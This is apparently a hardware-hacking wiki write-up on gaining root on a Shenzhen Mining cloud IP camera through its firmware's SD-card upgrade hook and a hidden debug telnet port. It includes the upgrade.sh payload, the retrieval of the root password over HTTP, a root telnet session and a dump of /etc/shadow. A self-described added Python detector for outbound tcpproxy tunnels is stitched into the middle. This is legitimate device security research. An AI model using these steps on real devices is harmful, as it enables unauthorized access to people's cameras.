<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root$ ls -laht project/<br />
<br />
total 3.2M<br />
drwxr-xr-x 2 rjmendez rjmendez 4.0K Apr 20 12:17 .<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml</pre><br />
<br />
It's unpacked at boot by the init script /etc/init.d/dev_init.sh:<br />
<br />
<pre>#prepare project<br />
unlzma -c /project/*.tar.lzma > /tmp/project.tar<br />
rm /project/*.tar.lzma<br />
<br />
...<br />
<br />
tar -xvf /tmp/project.tar -C /project/<br />
rm -rf /tmp/project.tar<br />
chmod -R 777 /project<br />
<br />
#dev_start<br />
if [ -e /mnt/mtd/flag_debug_dev_start ]; then<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" /mnt/mtd/flag_debug_dev_start existed<br />
else<br />
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" run /project/apps/app/ipc/data/sh/dev_start.sh<br />
cd /project/apps/app/ipc/data/sh<br />
./dev_start.sh<br />
fi</pre><br />
<br />
Extracting it all gives us this.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ unlzma -c ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma > project.tar<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ tar -xf project.tar<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ ls -laht<br />
total 14M<br />
drwxr-xr-x 5 rjmendez rjmendez 4.0K Apr 20 14:03 .<br />
-rw-rw-r-- 1 rjmendez rjmendez 11M Apr 20 14:02 project.tar<br />
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma<br />
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc<br />
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..<br />
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 apps<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 platforms<br />
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 faraday<br />
-rw-r--r-- 1 rjmendez rjmendez 2 Oct 23 2015 kernel_version</pre><br />
<br />
Tons of good data in here! <br />
<br />
'''Gaining root'''<br />
<br />
We also have a great entry point in /project/apps/app/ipc/data/sh/sd_card_insert.sh: on SD card insert it runs /mnt/sd/upgrade/upgrade.sh from the card if that file exists.<br />
<br />
<pre>#!/bin/sh<br />
<br />
#mount sd_card<br />
if [ ! -d /mnt/sd ]; then<br />
/bin/mkdir /mnt/sd<br />
fi<br />
mount -o noatime,nodiratime,norelatime -t vfat /dev/mmcblk0p1 /mnt/sd<br />
<br />
#run hook<br />
if [ -e /mnt/sd/upgrade/upgrade.sh ]; then<br />
chmod 777 /mnt/sd/upgrade/upgrade.sh<br />
sh /mnt/sd/upgrade/upgrade.sh &<br />
fi<br />
<br />
wget http://127.0.0.1:80/ccm/CcmNotifyRequest/-dvalue-1.xml -O 1.xml<br />
<br />
rm -f 1.xml</pre><br />
<br />
What the hell is going on in /project/apps/app/ipc/data/sh/dev_passwd.sh?<br />
<br />
<pre>path_prompt=/tmp/prompt.debug<br />
path_pass=/tmp/pass.debug<br />
<br />
...<br />
<br />
#Generate ctx if needed<br />
if [ -z $ctx ]; then<br />
ctx_file=/tmp/ctx.dev<br />
if [ -e $ctx_file ]; then<br />
read ctx < $ctx_file<br />
fi<br />
<br />
if [ -z $ctx ]; then<br />
ctx=$RANDOM<br />
echo $ctx > $ctx_file<br />
fi<br />
fi<br />
<br />
...<br />
<br />
${bindir}/mipc_tool -cmd pass -devid ${devid} -prompt ${path_prompt} -pass ${path_pass}<br />
<br />
...<br />
<br />
read pass < $path_pass<br />
read prompt < $path_prompt<br />
echo "pass=${pass}, prompt=${prompt}"<br />
/bin/hostname ${prompt}${promp_eth}${promp_wifi}<br />
echo "root:${pass}"|chpasswd</pre><br />
<br />
It looks like they generate a new root password on every boot. Everything still runs as root and the password sits in a file at /tmp/pass.debug, so we should be able to get in over the serial line, but that's not very sexy.<br />
A look into /project/apps/app/ipc/data/sh/dev_telnet.sh gives us another option.<br />
<br />
<pre>#!/bin/sh<br />
<br />
port=9527<br />
file_flag=/mnt/mtd/flag_debug_telnet<br />
if [ -e ${file_flag} ]; then<br />
mode=on<br />
fi<br />
<br />
usage()<br />
{<br />
echo Usage:$0 [-m,--mode on/off] [-h,--help]<br />
exit<br />
}<br />
<br />
ARGS=`getopt -a -o m:h -l mode:,help -- "$@"`<br />
<br />
#set -- "${ARGS}"<br />
eval set -- "${ARGS}"<br />
<br />
while true<br />
do<br />
case "$1" in<br />
-m|--mode)<br />
mode="$2"<br />
shift<br />
;;<br />
-h|--help)<br />
usage<br />
;;<br />
--)<br />
shift<br />
break<br />
;;<br />
esac<br />
shift<br />
done<br />
<br />
if [ x"${mode}" == xon ]; then<br />
if [ ! -e ${file_flag} ]; then<br />
touch ${file_flag}<br />
fi<br />
<br />
if [ "" == "`ps -w | grep telnet | grep ${port} | grep -v grep`" ]; then<br />
telnetd -p ${port} &<br />
fi<br />
elif [ x"${mode}" == xoff ]; then<br />
if [ -e ${file_flag} ]; then<br />
rm ${file_flag}<br />
fi<br />
<br />
ps w| grep telnetd | grep ${port} | grep -v -E "grep" | while read line<br />
do<br />
pid=${line%% *}<br />
kill -9 $pid<br />
done<br />
fi</pre><br />
<br />
Well well well… Let's create an upgrade folder on our vfat-formatted micro SD card and put this script in it as upgrade.sh.<br />
<br />
<pre>#!/bin/sh<br />
sleep 45<br />
cd /project/apps/app/ipc/data/http/ && ln -s /tmp &<br />
/project/apps/app/ipc/data/sh/dev_telnet.sh -m on</pre><br />
<br />
After a little bit we should see this show up on the web server.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ curl http://192.168.187.254/tmp/pass.debug<br />
264e37dcd841b35344c68e8f95dc8b11</pre><br />
<br />
And then we can try telnet on the nonstandard debug port.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ telnet 192.168.187.254 9527<br />
Trying 192.168.187.254...<br />
Connected to 192.168.187.254.<br />
Escape character is '^]'.<br />
<br />
1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254 login: root<br />
Password: <br />
|---------------------------------------------------------------------------|<br />
| A |<br />
| AAA |<br />
| AAAAA |<br />
| AAAAAAA |<br />
| AAAA AA |<br />
| A AAAA AA |<br />
| AAA AAAA AA AAA AAAAA AAA AAAAA AAAAA |<br />
| AAAAA AAAA AA AA AA AA AA AA AA |<br />
| AAAAAAAAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA AAAA AA AAA AA AA AAA AA AA AA AA |<br />
| AAAAA A AA AAA AA AA AAA AA AA AAAAAA |<br />
| AAAAA AA AAA AA AA AAA AA AA AA |<br />
| AAAAAA AAAA AAA AA AA AAA AA AA AAAAAA |<br />
|===========================================================================|<br />
| |<br />
| http://www.shenzhenmining.com |<br />
| power by (C)shenzhenmining 2012 |<br />
|---------------------------------------------------------------------------|<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# echo "Root password is '264e37dcd841b35344c68e8f95dc8b11'"<br />
Root password is '264e37dcd841b35344c68e8f95dc8b11'<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ls -l /root<br />
-rwxr-xr-x 1 root root 54 Oct 23 2015 welcome.txt<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/sh<br />
bin:x:1:1:bin:/bin:/bin/sh<br />
daemon:x:2:2:daemon:/usr/sbin:/bin/sh<br />
adm:x:3:4:adm:/adm:/bin/sh<br />
lp:x:4:7:lp:/var/spool/lpd:/bin/sh<br />
sync:x:5:0:sync:/bin:/bin/sync<br />
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown<br />
halt:x:7:0:halt:/sbin:/sbin/halt<br />
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh<br />
operator:x:11:0:Operator:/var:/bin/sh<br />
nobody:x:99:99:nobody:/home:/bin/sh<br />
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/shadow<br />
root:S5Ada/QN0yHBo:12963:0:99999:7:::<br />
bin:*:12963:0:99999:7:::<br />
daemon:*:12963:0:99999:7:::<br />
adm:*:12963:0:99999:7:::<br />
lp:*:12963:0:99999:7:::<br />
sync:*:12963:0:99999:7:::<br />
shutdown:*:12963:0:99999:7:::<br />
halt:*:12963:0:99999:7:::<br />
uucp:*:12963:0:99999:7:::<br />
operator:*:12963:0:99999:7:::<br />
nobody:*:12963:0:99999:7:::</pre><br />
<br />
This device has never been connected to the internet; let's see what's running on it.<br />
<br />
<pre>[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ps | grep mipc<br />
600 root 2532 S ./mipc_tool -cmd wd -len 20 <br />
826 root 2664 S ./mipc_tool -cmd debug -server 1 <br />
945 root 2664 S ./mipc_tool -cmd led -dev eth -interval 500 <br />
987 root 2664 S ./mipc_tool -cmd led -dev wifi -interval 500 <br />
1009 root 2668 S ./mipc_tool -cmd led -dev single -interval 500 <br />
1015 root 2664 S ./mipc_tool -cmd click_listen <br />
1063 root 2668 S ../../../../../platforms/faraday-linux-armv5/bin/mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file<br />
1179 root 54140 S ./mipc -cont-conf ../../../apps/app/ipc/conf/container.conf </pre><br />
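<br />
The tcpproxy line above is the one a defender should care about: a process is bridging the local telnet port to a remote public host. The following is an added detection example (not part of the page or of the device's software) that parses BusyBox ps output and flags any tcpproxy invocation exposing a local service to an address outside private, loopback or link-local ranges. The sample lines are the ps output shown above; the column layout (PID USER VSZ STAT COMMAND) is the BusyBox default, and the --passive-remote/--remote option names are taken as they appear on the page.<br />
<br />
```python
"""Flag processes that proxy a local service out to a remote host.

Added detection example, not part of the page or of the device's software.
The sample is the BusyBox `ps | grep mipc` output shown on the page.
"""
import ipaddress
import re

# Constructed sample: the ps lines as printed on the page (whitespace normalised).
PS_SAMPLE = """\
  600 root      2532 S    ./mipc_tool -cmd wd -len 20
  826 root      2664 S    ./mipc_tool -cmd debug -server 1
 1015 root      2664 S    ./mipc_tool -cmd click_listen
 1063 root      2668 S    ../../../../../platforms/faraday-linux-armv5/bin/mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file
 1179 root     54140 S    ./mipc -cont-conf ../../../apps/app/ipc/conf/container.conf
"""

LOOPBACK_NAMES = {"localhost"}
PASSIVE_RE = re.compile(r"--passive-remote\s+(\S+)")      # local side being exposed
REMOTE_RE = re.compile(r"--remote\s+([^\s:]+):(\d+)")     # host:port, extra ':'-suffix ignored


def parse_ps(text):
    """Turn BusyBox ps lines into dicts; lines that do not start with a PID are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or not parts[0].isdigit():
            continue
        pid, user, _vsz, _stat, cmd = parts
        rows.append({"pid": int(pid), "user": user, "cmd": cmd.strip()})
    return rows


def is_public_host(host):
    """True for an address that is neither private, loopback nor link-local."""
    if host in LOOPBACK_NAMES:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True  # a hostname: treat as external until it is resolved
    return addr.is_global


def find_tcpproxies(rows):
    """Return one finding per tcpproxy process with both a local and a remote side."""
    findings = []
    for row in rows:
        cmd = row["cmd"]
        if "tcpproxy" not in cmd:
            continue
        passive = PASSIVE_RE.search(cmd)
        remote = REMOTE_RE.search(cmd)
        if not (passive and remote):
            continue
        host, port = remote.group(1), int(remote.group(2))
        findings.append({
            "pid": row["pid"],
            "user": row["user"],
            "local_target": passive.group(1),
            "remote_host": host,
            "remote_port": port,
            "remote_is_public": is_public_host(host),
        })
    return findings


def severity(finding):
    """Shell-style services (telnet/ssh) bridged to a public host are the worst case."""
    local_port = finding["local_target"].rsplit(":", 1)[-1]
    if finding["remote_is_public"] and local_port in {"22", "23"}:
        return "high"
    return "medium" if finding["remote_is_public"] else "low"


if __name__ == "__main__":
    for f in find_tcpproxies(parse_ps(PS_SAMPLE)):
        print("[%s] pid %d (%s): %s -> %s:%d" % (severity(f), f["pid"], f["user"],
              f["local_target"], f["remote_host"], f["remote_port"]))
```
<br />
On a live device the same parser can be fed `ps w` output over the UART; the useful follow-up is to correlate the remote host with the device's firewall or egress logs, since the page notes this unit had never been online yet was already configured to reach out.<br />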
<br />
== Future ==<br />
<br />
We need to look into mipc_tool and the mipc program itself.</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_store.png&diff=2682File:Cloudipcam store.png2017-04-21T01:58:20Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_board.jpg&diff=2681File:Cloudipcam board.jpg2017-04-21T01:54:27Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_bottom.jpg&diff=2680File:Cloudipcam bottom.jpg2017-04-21T01:51:51Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_back.jpg&diff=2679File:Cloudipcam back.jpg2017-04-21T01:51:23Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_profile.jpg&diff=2678File:Cloudipcam profile.jpg2017-04-21T01:50:34Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_front.jpg&diff=2677File:Cloudipcam front.jpg2017-04-21T01:48:54Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_UART_pins.jpg&diff=2676File:Cloudipcam UART pins.jpg2017-04-21T01:37:30Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Cloudipcam_mxic25l12835f.jpg&diff=2675File:Cloudipcam mxic25l12835f.jpg2017-04-21T01:32:34Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendez